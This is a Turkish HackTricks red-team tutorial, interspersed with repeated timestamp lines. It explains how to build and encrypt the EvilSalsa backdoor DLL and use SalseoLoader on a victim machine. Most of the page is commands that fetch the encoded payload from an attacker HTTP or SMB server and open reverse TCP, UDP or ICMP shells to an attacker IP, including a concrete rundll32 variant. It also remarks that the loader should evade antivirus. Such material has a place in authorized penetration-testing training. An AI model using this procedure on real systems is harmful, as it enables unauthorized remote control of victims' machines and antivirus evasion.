2024-04-06 19:40:41 +00:00
# Salseo
2024-07-18 22:12:31 +00:00
{% hint style="success" %}
AWS Hacking'i öğrenin ve pratik yapı n:< img src = "/.gitbook/assets/arte.png" alt = "" data-size = "line" > [**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)< img src = "/.gitbook/assets/arte.png" alt = "" data-size = "line" > \
GCP Hacking'i öğrenin ve pratik yapı n: < img src = "/.gitbook/assets/grte.png" alt = "" data-size = "line" > [**HackTricks Training GCP Red Team Expert (GRTE)**< img src = "/.gitbook/assets/grte.png" alt = "" data-size = "line" > ](https://training.hacktricks.xyz/courses/grte)
2024-04-06 19:40:41 +00:00
2024-07-18 22:12:31 +00:00
< details >
2024-04-06 19:40:41 +00:00
2024-07-18 22:12:31 +00:00
< summary > HackTricks'i Destekleyin< / summary >
2024-04-06 19:40:41 +00:00
2024-07-18 22:12:31 +00:00
* [**abonelik planları nı ** ](https://github.com/sponsors/carlospolop ) kontrol edin!
* **💬 [**Discord grubuna** ](https://discord.gg/hRep4RUj7f ) veya [**telegram grubuna** ](https://t.me/peass ) katı lı n ya da **Twitter'da** 🐦 [**@hacktricks\_live** ](https://twitter.com/hacktricks\_live )** bizi takip edin.**
* **Hacking ipuçları nı paylaşmak için** [**HackTricks** ](https://github.com/carlospolop/hacktricks ) ve [**HackTricks Cloud** ](https://github.com/carlospolop/hacktricks-cloud ) github reposuna PR gönderin.
2024-04-06 19:40:41 +00:00
< / details >
2024-07-18 22:12:31 +00:00
{% endhint %}
2024-04-06 19:40:41 +00:00
2024-07-18 22:12:31 +00:00
## Binaries'leri Derleme
2024-04-06 19:40:41 +00:00
2024-07-18 22:12:31 +00:00
Github'dan kaynak kodunu indirin ve **EvilSalsa** ve **SalseoLoader** 'ı derleyin. Kodu derlemek için **Visual Studio** 'nun yüklü olması gerekmektedir.
2024-04-06 19:40:41 +00:00
2024-07-18 22:12:31 +00:00
Bu projeleri, kullanacağı nı z Windows kutusunun mimarisi için derleyin (Eğer Windows x64 destekliyorsa, bu mimariler için derleyin).
2024-04-06 19:40:41 +00:00
2024-07-18 22:12:31 +00:00
**Visual Studio**'da **sol "Build" Sekmesi** içindeki ** "Platform Target"** kı smı ndan **mimariyi seçebilirsiniz.**
2024-04-06 19:40:41 +00:00
2024-07-18 22:12:31 +00:00
(\*\*Bu seçenekleri bulamazsanı z ** "Project Tab"**'ı na tı klayı n ve ardı ndan ** "\<Project Name> Properties"**'e tı klayı n)
2024-04-06 19:40:41 +00:00
2024-05-05 22:43:52 +00:00
![](< .. / . gitbook / assets / image ( 839 ) . png > )
2024-04-06 19:40:41 +00:00
2024-07-18 22:12:31 +00:00
Sonra, her iki projeyi de derleyin (Build -> Build Solution) (Kayı tlarda çalı ştı rı labilir dosyanı n yolu görünecektir):
2024-04-06 19:40:41 +00:00
2024-05-05 22:43:52 +00:00
![](< .. / . gitbook / assets / image ( 381 ) . png > )
2024-04-06 19:40:41 +00:00
## Arka Kapı yı Hazı rlama
2024-07-18 22:12:31 +00:00
Öncelikle, **EvilSalsa.dll** 'yi kodlamanı z gerekecek. Bunu yapmak için, **encrypterassembly.py** python script'ini kullanabilir veya **EncrypterAssembly** projesini derleyebilirsiniz:
2024-04-06 19:40:41 +00:00
### **Python**
```
python EncrypterAssembly/encrypterassembly.py < FILE > < PASSWORD > < OUTPUT_FILE >
python EncrypterAssembly/encrypterassembly.py EvilSalsax.dll password evilsalsa.dll.txt
```
### Windows
```
EncrypterAssembly.exe < FILE > < PASSWORD > < OUTPUT_FILE >
EncrypterAssembly.exe EvilSalsax.dll password evilsalsa.dll.txt
```
2024-07-18 22:12:31 +00:00
Tamam, şimdi Salseo işlemlerini gerçekleştirmek için ihtiyacı nı z olan her şeye sahipsiniz: **encoded EvilDalsa.dll** ve **SalseoLoader'ı n binary'si.**
2024-04-06 19:40:41 +00:00
2024-07-18 22:12:31 +00:00
**SalseoLoader.exe binary'sini makineye yükleyin. Hiçbir antivirüs tarafı ndan tespit edilmemelidir...**
2024-04-06 19:40:41 +00:00
2024-07-18 22:12:31 +00:00
## **Arka kapı yı çalı ştı rma**
2024-04-06 19:40:41 +00:00
2024-07-18 22:12:31 +00:00
### **TCP ters shell almak (HTTP üzerinden encoded dll indirme)**
2024-04-06 19:40:41 +00:00
2024-07-18 22:12:31 +00:00
nc'yi ters shell dinleyicisi olarak başlatmayı ve encoded evilsalsa'yı sunmak için bir HTTP sunucusu kurmayı unutmayı n.
2024-04-06 19:40:41 +00:00
```
SalseoLoader.exe password http://< Attacker-IP > /evilsalsa.dll.txt reversetcp < Attacker-IP > < Port >
```
2024-07-18 22:12:31 +00:00
### **UDP ters shell almak (SMB üzerinden kodlanmı ş dll indirme)**
2024-04-06 19:40:41 +00:00
2024-07-18 22:12:31 +00:00
nc'yi ters shell dinleyicisi olarak başlatmayı ve kodlanmı ş evilsalsa'yı sunmak için bir SMB sunucusu kurmayı unutmayı n.
2024-04-06 19:40:41 +00:00
```
SalseoLoader.exe password \\< Attacker-IP > /folder/evilsalsa.dll.txt reverseudp < Attacker-IP > < Port >
```
2024-07-18 22:12:31 +00:00
### **ICMP ters shell almak (şifrelenmiş dll zaten kurbanı n içinde)**
2024-04-06 19:40:41 +00:00
2024-07-18 22:12:31 +00:00
**Bu sefer ters shell almak için istemcide özel bir araca ihtiyacı nı z var. İndirin:** [**https://github.com/inquisb/icmpsh** ](https://github.com/inquisb/icmpsh )
2024-04-06 19:40:41 +00:00
2024-07-18 22:12:31 +00:00
#### **ICMP Yanı tları nı Devre Dı şı Bı rak:**
2024-04-06 19:40:41 +00:00
```
sysctl -w net.ipv4.icmp_echo_ignore_all=1
#You finish, you can enable it again running:
sysctl -w net.ipv4.icmp_echo_ignore_all=0
```
2024-07-18 22:12:31 +00:00
#### Müşteriyi çalı ştı r:
2024-04-06 19:40:41 +00:00
```
python icmpsh_m.py "< Attacker-IP > " "< Victm-IP > "
```
#### Kurbanı n içinde, salseo şeyini çalı ştı ralı m:
```
SalseoLoader.exe password C:/Path/to/evilsalsa.dll.txt reverseicmp < Attacker-IP >
```
2024-07-18 22:12:31 +00:00
## SalseoLoader'ı ana fonksiyonu dı şa aktaran DLL olarak derleme
2024-04-06 19:40:41 +00:00
2024-07-18 22:12:31 +00:00
SalseoLoader projesini Visual Studio ile açı n.
2024-04-06 19:40:41 +00:00
2024-07-18 22:12:31 +00:00
### Ana fonksiyondan önce ekleyin: \[DllExport]
2024-04-06 19:40:41 +00:00
2024-05-05 22:43:52 +00:00
![](< .. / . gitbook / assets / image ( 409 ) . png > )
2024-04-06 19:40:41 +00:00
2024-07-18 22:12:31 +00:00
### Bu proje için DllExport'ı yükleyin
2024-04-06 19:40:41 +00:00
2024-07-18 22:12:31 +00:00
#### **Araçlar** --> **NuGet Paket Yöneticisi** --> **Çözüm için NuGet Paketlerini Yönet...**
2024-04-06 19:40:41 +00:00
2024-05-05 22:43:52 +00:00
![](< .. / . gitbook / assets / image ( 881 ) . png > )
2024-04-06 19:40:41 +00:00
2024-07-18 22:12:31 +00:00
#### **DllExport paketini arayı n (Gözat sekmesini kullanarak) ve Yükle'ye bası n (ve açı lan pencereyi kabul edin)**
2024-04-06 19:40:41 +00:00
2024-05-05 22:43:52 +00:00
![](< .. / . gitbook / assets / image ( 100 ) . png > )
2024-04-06 19:40:41 +00:00
2024-07-18 22:12:31 +00:00
Proje klasörünüzde **DllExport.bat** ve **DllExport\_Configure.bat** dosyaları belirdi.
2024-04-06 19:40:41 +00:00
2024-07-18 22:12:31 +00:00
### **U**ninstall DllExport
2024-04-06 19:40:41 +00:00
2024-07-18 22:12:31 +00:00
**Kaldı r**'a bası n (evet, garip ama bana güvenin, bu gerekli)
2024-04-06 19:40:41 +00:00
2024-05-05 22:43:52 +00:00
![](< .. / . gitbook / assets / image ( 97 ) . png > )
2024-04-06 19:40:41 +00:00
2024-07-18 22:12:31 +00:00
### **Visual Studio'dan çı kı n ve DllExport\_configure'ı çalı ştı rı n**
2024-04-06 19:40:41 +00:00
2024-07-18 22:12:31 +00:00
Sadece **çı kı n** Visual Studio'dan
2024-04-06 19:40:41 +00:00
2024-07-18 22:12:31 +00:00
Sonra, **SalseoLoader klasörünüze** gidin ve **DllExport\_Configure.bat** 'ı çalı ştı rı n.
2024-04-06 19:40:41 +00:00
2024-07-18 22:12:31 +00:00
**x64**'ü seçin (eğer x64 bir kutu içinde kullanacaksanı z, benim durumum buydu), **System.Runtime.InteropServices** 'i seçin ( **DllExport için Ad Alanı ** içinde) ve **Uygula** 'ya bası n.
2024-04-06 19:40:41 +00:00
2024-05-05 22:43:52 +00:00
![](< .. / . gitbook / assets / image ( 882 ) . png > )
2024-04-06 19:40:41 +00:00
2024-07-18 22:12:31 +00:00
### **Projeyi tekrar Visual Studio ile açı n**
2024-04-06 19:40:41 +00:00
2024-07-18 22:12:31 +00:00
**\[DllExport]** artı k hata olarak işaretlenmemelidir.
2024-04-06 19:40:41 +00:00
2024-05-05 22:43:52 +00:00
![](< .. / . gitbook / assets / image ( 670 ) . png > )
2024-04-06 19:40:41 +00:00
### Çözümü derleyin
2024-07-18 22:12:31 +00:00
**Çı ktı Türü = Sı nı f Kütüphanesi**'ni seçin (Proje --> SalseoLoader Özellikleri --> Uygulama --> Çı ktı türü = Sı nı f Kütüphanesi)
2024-04-06 19:40:41 +00:00
2024-05-05 22:43:52 +00:00
![](< .. / . gitbook / assets / image ( 847 ) . png > )
2024-04-06 19:40:41 +00:00
2024-07-18 22:12:31 +00:00
**x64** **platformunu** seçin (Proje --> SalseoLoader Özellikleri --> Derleme --> Platform hedefi = x64)
2024-04-06 19:40:41 +00:00
2024-05-05 22:43:52 +00:00
![](< .. / . gitbook / assets / image ( 285 ) . png > )
2024-04-06 19:40:41 +00:00
2024-07-18 22:12:31 +00:00
Çözümü **derlemek** için: Derle --> Çözümü Derle (Çı ktı konsolunun içinde yeni DLL'in yolu görünecektir)
2024-04-06 19:40:41 +00:00
2024-07-18 22:12:31 +00:00
### Oluşturulan Dll'i test edin
2024-04-06 19:40:41 +00:00
2024-07-18 22:12:31 +00:00
Dll'i test etmek istediğiniz yere kopyalayı n ve yapı ştı rı n.
2024-04-06 19:40:41 +00:00
2024-07-18 22:12:31 +00:00
Çalı ştı rı n:
2024-04-06 19:40:41 +00:00
```
rundll32.exe SalseoLoader.dll,main
```
Eğer hata görünmüyorsa, muhtemelen işlevsel bir DLL'niz var!!
2024-07-18 22:12:31 +00:00
## DLL kullanarak bir shell alı n
2024-04-06 19:40:41 +00:00
2024-07-18 22:12:31 +00:00
Bir **HTTP** **sunucusu** kullanmayı ve bir **nc** **dinleyicisi** ayarlamayı unutmayı n.
2024-04-06 19:40:41 +00:00
### Powershell
```
$env:pass="password"
$env:payload="http://10.2.0.5/evilsalsax64.dll.txt"
$env:lhost="10.2.0.5"
$env:lport="1337"
$env:shell="reversetcp"
rundll32.exe SalseoLoader.dll,main
```
### CMD
```
set pass=password
set payload=http://10.2.0.5/evilsalsax64.dll.txt
set lhost=10.2.0.5
set lport=1337
set shell=reversetcp
rundll32.exe SalseoLoader.dll,main
```
2024-07-18 22:12:31 +00:00
{% hint style="success" %}
AWS Hacking'i öğrenin ve pratik yapı n:< img src = "/.gitbook/assets/arte.png" alt = "" data-size = "line" > [**HackTricks Eğitim AWS Kı rmı zı Takı m Uzmanı (ARTE)**](https://training.hacktricks.xyz/courses/arte)< img src = "/.gitbook/assets/arte.png" alt = "" data-size = "line" > \
GCP Hacking'i öğrenin ve pratik yapı n: < img src = "/.gitbook/assets/grte.png" alt = "" data-size = "line" > [**HackTricks Eğitim GCP Kı rmı zı Takı m Uzmanı (GRTE)**< img src = "/.gitbook/assets/grte.png" alt = "" data-size = "line" > ](https://training.hacktricks.xyz/courses/grte)
2024-04-06 19:40:41 +00:00
2024-07-18 22:12:31 +00:00
< details >
2024-04-06 19:40:41 +00:00
2024-07-18 22:12:31 +00:00
< summary > HackTricks'i Destekleyin< / summary >
2024-04-06 19:40:41 +00:00
2024-07-18 22:12:31 +00:00
* [**abonelik planları nı ** ](https://github.com/sponsors/carlospolop ) kontrol edin!
* **💬 [**Discord grubuna** ](https://discord.gg/hRep4RUj7f ) veya [**telegram grubuna** ](https://t.me/peass ) katı lı n ya da **Twitter'da** 🐦 [**@hacktricks\_live** ](https://twitter.com/hacktricks\_live )**'i takip edin.**
* **Hacking ipuçları nı paylaşmak için** [**HackTricks** ](https://github.com/carlospolop/hacktricks ) ve [**HackTricks Cloud** ](https://github.com/carlospolop/hacktricks-cloud ) github reposuna PR gönderin.
2024-04-06 19:40:41 +00:00
< / details >
2024-07-18 22:12:31 +00:00
{% endhint %}